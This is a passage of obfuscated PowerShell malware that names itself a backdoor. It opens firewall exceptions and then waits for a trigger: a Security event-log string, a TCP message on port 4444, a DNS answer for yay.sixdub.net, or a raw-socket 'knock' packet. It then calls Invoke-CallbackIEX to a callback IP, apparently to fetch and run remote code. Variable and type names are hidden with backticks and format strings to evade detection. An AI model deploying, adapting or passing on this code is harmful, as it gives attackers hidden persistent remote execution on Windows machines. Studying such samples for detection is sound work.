${rU`le}."DiRe`cTI`ON" = 2
${RU`le}."en`AblEd"=${tR`uE}
${R`uLE}."GroupI`Ng"="@firewallapi.dll,-23255"
${R`uLe}."p`ROfi`LEs" = 7
${R`ULe}."aCt`i`oN"=1
${Ru`Le}."EDgeTrAVE`R`saL"=${f`A`lse}
${Fw}."Rul`es"."a`dd"(${r`uLE})
${ru`LE} = New-Object -ComObject ("{1}{0}{2}{3}"-f'fg.F','HNetC','WRu','le')
${rU`Le}."NA`mE" = ${Ru`le`NAme}
${R`ULe}."a`ppLICationNa`ME"=${E`XepAth}
${Ru`LE}."P`R`otOcOl" = 6
${R`UlE}."L`O`caLporTS" = ${Por`Ts}
${R`ulE}."d`I`REcTiOn" = 1
${ru`lE}."ENA`BL`ED"=${tr`UE}
${r`UlE}."gro`uPI`Ng"="@firewallapi.dll,-23255"
${r`uLE}."Pr`O`FILEs" = 7
${r`Ule}."A`C`TiON"=1
${ru`lE}."EDgE`TRAV`ERSaL"=${fA`lsE}
${F`w}."RU`les"."A`dd"(${RU`lE})
${r`UlE} = New-Object -ComObject ("{0}{1}{2}{3}" -f 'H','NetCfg','.FW','Rule')
${r`uLE}."n`AMe" = ${ruleNa`me}
${Ru`le}."APp`LicaT`I`oN`NamE"=${ExePa`TH}
${rU`Le}."P`Rot`OCol" = 17
${RU`Le}."Loc`Alp`ORTs" = ${poR`Ts}
${r`ulE}."DIRectI`on" = 1
${r`ulE}."en`A`BLeD"=${t`Rue}
${RU`Le}."Gr`oUP`iNG"="@firewallapi.dll,-23255"
${r`UlE}."PrO`F`ileS" = 7
${r`uLE}."A`CTI`ON"=1
${R`ule}."Ed`gET`RaV`eRsaL"=${F`ALSe}
${F`W}."r`uLEs"."A`Dd"(${R`ule})
}
function InVOk`e`-EVeNTLoop
{
Param(
[Parameter(mANdAtOry=${T`RUE},POsiTion=1)]
[string]${cAlLBa`Ck`Ip},
[Parameter(MaNdAtoRY=${fA`lSE},PosITion=2)]
[string]${tRI`GG`ER}="SIXDUB",
[Parameter(MAnDaTORy=${F`AL`SE},PoSITIOn=3)]
[int]${tiM`EoUt}=0,
[Parameter(maNDatOry=${fA`LSE},PosiTiON=4)]
[int] ${s`lEEP}=1
)
If (-NOT ([Security.Principal.WindowsPrincipal] ( vARIABLe ('z'+'NU') -vALUEONl)::"gEtc`ur`ReNT"())."IsiN`RoLE"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This backdoor requires Admin :(... get to work! "
Return
}
write-host "Timeout: $Timeout"
write-host "Trigger: $Trigger"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${rUN`Ni`NG}=${t`RUE}
${mAT`ch} =""
${s`TArt`TImE} = get-date
while(${runn`i`Ng})
{
if (${timE`ouT} -ne 0 -and ($( ( vaRIAble ('I6S5n'+'r') ).VALuE::"N`OW") -gt ${st`A`RTtI`mE}."aDDs`ECO`NDs"(${ti`MEO`ut})))
{
${rUn`N`inG}=${FA`lSE}
}
${D} = Get-Date
${n`eW`EVEnTs} = Get-WinEvent -FilterHashtable @{"l`og`NAMe"='Security'; "ST`ArTT`IME"=${D}."aDDSecO`N`DS"(-${Sl`eEp})} -ErrorAction ("{2}{1}{0}"-f'ntinue','Co','Silently') | fl ("{1}{2}{0}" -f'e','M','essag') | Out-String
if (${nEw`even`TS} -match ${Tri`Gg`eR})
{
${runN`i`NG}=${FA`lSE}
${MAt`Ch} = ${C`Al`lbA`ckIP}
write-host "Match: $match"
}
sleep -s ${Sl`E`EP}
}
if(${m`Atch})
{
${suc`c`ESS} = Invoke-CallbackIEX ${MA`T`Ch}
}
}
function iNvo`KE`-pORTB`i`ND
{
Param(
[Parameter(MANdatory=${f`AlsE},PoSiTion=1)]
[string]${Cal`L`BAckiP},
[Parameter(maNDaTOrY=${fA`lse},pOSItIon=2)]
[string]${L`ocalIP},
[Parameter(mANDatorY=${f`ALSe},POsitION=3)]
[int]${P`OrT}=4444,
[Parameter(maNdAToRy=${F`AlsE},pOSiTIoN=4)]
[string]${t`R`iGgEr}="QAZWSX123",
[Parameter(MAnDAtoRY=${FA`LSE},POSiTion=5)]
[int]${TIM`E`ouT}=0
)
if (-not ${LOc`A`lIP})
{
route ("{1}{0}"-f'int','pr') ('0*') | % {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${N`ulL},${NU`ll},${N`ulL},${L`oCALIP},${n`uLl} = (VARiABle ('Q8w'+'Gpc') -VaLUeoNL )::"REp`LA`cE"(${_}."trI`MSTa`RT"(" "),"\s{2,}",",")."sPl`it"(",")
}
}
}
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
write-host "Timeout: $Timeout"
write-host "Port: $Port"
write-host "Trigger: $Trigger"
write-host "Using IPv4 Address: $LocalIP"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
try{
${iPeNd`POi`Nt} = new-object ("{2}{1}{0}{5}{4}{3}" -f't.ip','m.ne','syste','t','in','endpo')([net.ipaddress]"$localIP",${P`Ort})
${li`sTE`NEr} = new-object ("{0}{2}{7}{4}{6}{8}{1}{5}{3}" -f 'Sys','n','tem.','r','ock','e','ets.TcpLi','Net.S','ste') ${i`p`En`DPoinT}
${L`Isten`er}."St`Art"()
${RU`N`NinG}=${tr`Ue}
${M`AtCH} =""
${sta`R`TTi`ME} = get-date
while(${RU`Nn`inG})
{
if (${T`IMEO`ut} -ne 0 -and ($( ( Gi ("{2}{0}{3}{1}"-f 'RiaBlE','5NR','VA',':I6S') ).VALue::"N`ow") -gt ${St`AR`TTIME}."Ad`d`sECoNds"(${Ti`M`eOuT})))
{
${Ru`NN`inG}=${Fa`L`se}
}
if(${l`ISTE`NER}."Pe`Nd`Ing"())
{
${cL`I`EnT} = ${liSt`EN`Er}."accE`PTtcp`cl`IE`Nt"()
write-host "Client Connected!"
${S`TR`eam} = ${cl`IENT}."Ge`Tst`REAm"()
${REAd`ER} = new-object ("{3}{0}{4}{2}{1}" -f 'IO.','eader','reamR','System.','St') ${st`REAm}
${Li`NE} = ${RE`AD`Er}."reA`D`Line"()
if (${LI`Ne} -eq ${tRIG`G`Er})
{
${ru`Nni`Ng}=${FA`lSE}
${M`AT`CH} = ([system.net.ipendpoint] ${C`LI`enT}."cL`ieNt"."rEmotE`enDP`O`i`Nt")."aDD`R`ESS"."tOsTr`ING"()
write-host "MATCH: $match"
}
${reaD`eR}."dI`SpoSe"()
${ST`R`eAM}."dISPO`SE"()
${cli`E`NT}."c`LosE"()
write-host "Client Disconnected"
}
}
write-host "Stopping Socket"
${l`ISTenEr}."s`TOp"()
if(${mA`TCh})
{
if(${CA`lLb`A`Ckip})
{
${Suc`CesS} = Invoke-CallbackIEX ${c`AlLbA`cKIp}
}
else
{
${SuC`cE`Ss} = Invoke-CallbackIEX ${MAt`Ch}
}
}
}
catch [System.Net.Sockets.SocketException] {
write-host "Error: Socket Error" -fore ("{0}{1}"-f're','d')
}
}
function InVo`kE`-`DNsL`OOp
{
param(
[Parameter(mAndATOry=${FA`lse},pOsiTIOn=1)]
[string]${C`AllBack`IP},
[Parameter(MandATOrY=${fa`l`se},POsitioN=2)]
[string]${HO`S`TnaMe}="yay.sixdub.net",
[Parameter(MaNDaTOry=${fA`lSe},POsitiOn=3)]
[string]${TrIg`G`ER}="127.0.0.1",
[Parameter(MaNDaToRY=${F`Al`se},PoSItIOn=4)]
[int] ${TIme`O`Ut}=0,
[Parameter(mAnDAtory=${Fa`l`SE},PoSItioN=5)]
[int] ${sLe`Ep}=1
)
write-host "Timeout: $Timeout"
write-host "Sleep Time: $Sleep"
write-host "Trigger: $Trigger"
write-host "Using Hostname: $Hostname"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${r`UN`NinG}=${tr`ue}
${mat`cH} =""
${Sta`RTt`ime} = get-date
while(${RUn`NIng})
{
if (${Tim`EouT} -ne 0 -and ($( ( gET-vARIAble ("I6s5"+"Nr") ).value::"N`Ow") -gt ${Sta`R`TtiME}."aDDSec`O`Nds"(${TIM`eO`Ut})))
{
${R`uN`NInG}=${Fa`L`sE}
}
try {
${I`pS} = ( Get-VArIABle ("{1}{0}"-f 'RIxE','t') -vA)::"gEtH`OsTaD`DrEsS`Es"(${HO`stN`A`ME})
foreach (${ad`Dr} in ${I`Ps})
{
${r`Es`OL`Ved}=${a`DDR}."IpADdrESsT`Os`T`RING"
if(${reS`OL`VEd} -ne ${tR`I`Gger})
{
${RuN`NIng}=${F`AL`Se}
${mA`TcH}=${re`SOLv`Ed}
write-host "Match: $match"
}
}
}
catch [System.Net.Sockets.SocketException]{
}
sleep -s ${s`L`eEp}
}
write-host "Shutting down DNS Check..."
if(${ma`Tch})
{
if(${CAlLbAc`K`IP})
{
${su`cce`ss} = Invoke-CallbackIEX ${cA`lLBack`ip}
}
else
{
${su`ccE`sS} = Invoke-CallbackIEX ${m`ATch}
}
}
}
function inVok`e-P`ACKe`TkNOcK
{
param(
[Parameter(MANdaTorY=${faL`sE},pOsitIoN=1)]
[string]${CaLL`B`Ack`iP},
[Parameter(MANdatoRy=${f`Alse},POSiTion=2)]
[string]${lo`cAL`iP},
[Parameter(maNdatOrY=${f`AlSE},PoSiTIOn=3)]
[string]${tRIgG`eR}="QAZWSX123",
[Parameter(mAndaTORY=${fal`SE},pOsITIon=4)]
[int]${tI`Me`OUt}=0
)
If (-NOT ([Security.Principal.WindowsPrincipal] ( get-VARIABle ("Zn"+"u") -vaLueONLy)::"GE`TCuRr`e`NT"())."i`sIn`RoLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This backdoor requires Admin :(... get to work! "
Return
}
if (-not ${lo`caLIP})
{
route ("{1}{0}" -f'int','pr') ('0*') | % {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${nU`lL},${n`ULL},${nu`Ll},${L`oC`AliP},${n`ull} = ( lS ("vaRIaBlE"+":Q8WgP"+"C") ).vALue::"re`P`lACE"(${_}."T`Ri`mStArT"(" "),"\s{2,}",",")."SP`lIt"(",")
}
}
}
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
write-host "Timeout: $Timeout"
write-host "Trigger: $Trigger"
write-host "Using IPv4 Address: $LocalIP"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${BY`TE`IN} = new-object ("{1}{0}" -f 'te[]','by') 4
${BY`TE`oUT} = new-object ("{2}{0}{1}" -f't','e[]','by') 4
${by`T`edata} = new-object ("{0}{1}" -f 'byte[',']') 4096
${BYTE`iN}[0] = 1
${b`YT`EIn}[1-3] = 0
${byT`eOut}[0-3] = 0
${s`OCket} = new-object ("{5}{3}{2}{6}{4}{0}{1}" -f 'kets','.socket','n','stem.','soc','sy','et.')( (DIR ("{2}{0}{3}{1}{4}"-f'lE:','fI','vaRIAb','L8','uY')).value::"iNte`R`Ne`TwoRk", (GCi ("{1}{0}{2}{3}"-f'aRIABLe:2','v','64p','VJ') ).ValUE::"r`AW", $EaCs::"Ip")
${s`ocK`Et}."sEtSOc`ketopti`On"("IP","HeaderIncluded",${t`RUe})
${So`CK`eT}."re`ceIve`BufFEr`sIzE" = 819200
${i`pE`N`dpoint} = new-object ("{6}{2}{0}{5}{4}{1}{3}"-f'em.n','i','t','nt','ipendpo','et.','sys')([net.ipaddress]"$localIP",0)
${S`OCkEt}."b`inD"(${i`pendP`oI`NT})
[void]${s`Oc`kEt}."IocoNtr`ol"( $jmhB::"r`EceIV`eA`ll",${bYT`eiN},${B`yT`eoUt})
${s`T`AR`TTiME} = get-date
${rUN`NiNG} = ${Tr`Ue}
${MAt`cH} = ""
${p`Ack`Ets} = @()
while (${r`UN`NiNg})
{
if (${T`I`MeOut} -ne 0 -and ($( (GET-chIldiTEM ("{3}{0}{4}{2}{1}"-f'arIABLe:','s5NR','6','V','i') ).vaLUe::"N`OW") -gt ${St`A`R`TtimE}."a`d`dsecONDS"(${tI`MeoUT})))
{
${RU`Nn`INg}=${f`ALSe}
}
if (-not ${S`oCkeT}."aV`AIlA`BLe")
{
start-sleep -milliseconds 500
continue
}
${R`cV} = ${s`Ock`ET}."rE`Ce`IVe"(${Byt`E`DATA},0,${BYTe`d`A`Ta}."lEN`GtH", $y4HBR::"NO`NE")
${meMOr`YS`Tr`eAm} = new-object ("{5}{6}{3}{1}{2}{0}{4}" -f 'mo','.M','e','O','ryStream','Syste','m.I')(${B`Y`TedatA},0,${r`cv})
${B`InArYRE`A`Der} = new-object ("{0}{4}{1}{3}{2}"-f 'Syst','.Bi','der','naryRea','em.IO')(${mEm`o`RYstREAM})
${T`RaSH} = ${B`iN`A`RYrea`DER}."rE`A`DbytEs"(12)
${SO`Ur`Ceip`A`dDRess} = ${BInA`RYREa`DEr}."reA`DUin`T32"()
${sOU`Rc`Eip`AddrEsS} = [System.Net.IPAddress]${SO`U`RceiP`ADD`REss}
${Des`TinAtiOnIP`A`DD`RESs} = ${B`InaRYr`e`ADeR}."reAd`u`INt32"()
${d`ESt`i`NA`TioNIPAd`Dre`SS} = [System.Net.IPAddress]${de`s`T`INAtIONIpaddR`E`ss}
${REmai`NDerb`Y`Tes} = ${bIn`ArY`R`EAder}."R`EA`DbYTeS"(${me`M`OrysT`Re`AM}."l`En`gTH")
${ASciie`N`CODIng} = new-object ("{3}{1}{4}{2}{0}" -f 'iiencoding','stem','xt.asc','sy','.te')
${reMaINd`E`ROfPAcK`et} = ${asc`Iienc`oDing}."g`ETS`TRINg"(${remai`Nder`B`Y`Tes})
${b`InarY`R`EaDEr}."c`loSe"()
${m`eM`OryStR`E`AM}."Cl`Ose"()
if (${R`EmA`IndER`OFPA`C`KEt} -match ${T`RiG`ger})
{
write-host "Match: " ${SourCE`iPa`D`d`ReSS}
${r`uNNi`Ng}=${FAl`SE}
${MAt`ch} = ${S`ourCEIpaD`d`Re`sS}
}
}
if(${MA`T`CH})
{
if(${cAL`lB`AcK`ip})
{
${S`uCC`EsS} = Invoke-CallbackIEX ${C`A`llbaCKIp}
}
else
{
${sU`Cce`ss} = Invoke-CallbackIEX ${Ma`Tch}
}
}
}
function i`N`Vok`E-CalLb`AC`KLOop
{
Param(
[Parameter(MaNdATorY=${tR`uE},PoSitIoN=1)]
[string]${c`All`Ba`ckIP},
[Parameter(maNDatoRY=${f`AL`se},poSItION=2)]
[int]${tiME`O`ut}=0,
[Parameter(ManDATORy=${Fa`LSE},poSiTion=3)]
[int] ${Sle`Ep}=1
)
write-host "Timeout: $Timeout"
write-host "Sleep: $Sleep"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${Runn`I`NG}=${t`RuE}
${ma`T`ch} =""
${s`TART`TiMe} = get-date
while(${r`u`NNing})
{
if (${Ti`MeOuT} -ne 0 -and ($( ( gET-VARIAblE ("i6S"+"5nR") -vAlue)::"n`ow") -gt ${St`ArTTi`mE}."addS`e`conds"(${TI`mE`ouT})))
{
${Ru`N`NiNg}=${F`Al`sE}
}
${Ch`E`cksucce`ss} = Invoke-CallbackIEX ${C`ALLB`AcKiP} -Silent ${Tr`uE}
if(${ch`e`ckS`UCc`ESs} -eq 1)
{
${R`unn`inG}=${fal`Se}
}
sleep -s ${s`l`EeP}
}
write-host "Shutting down backdoor..."
}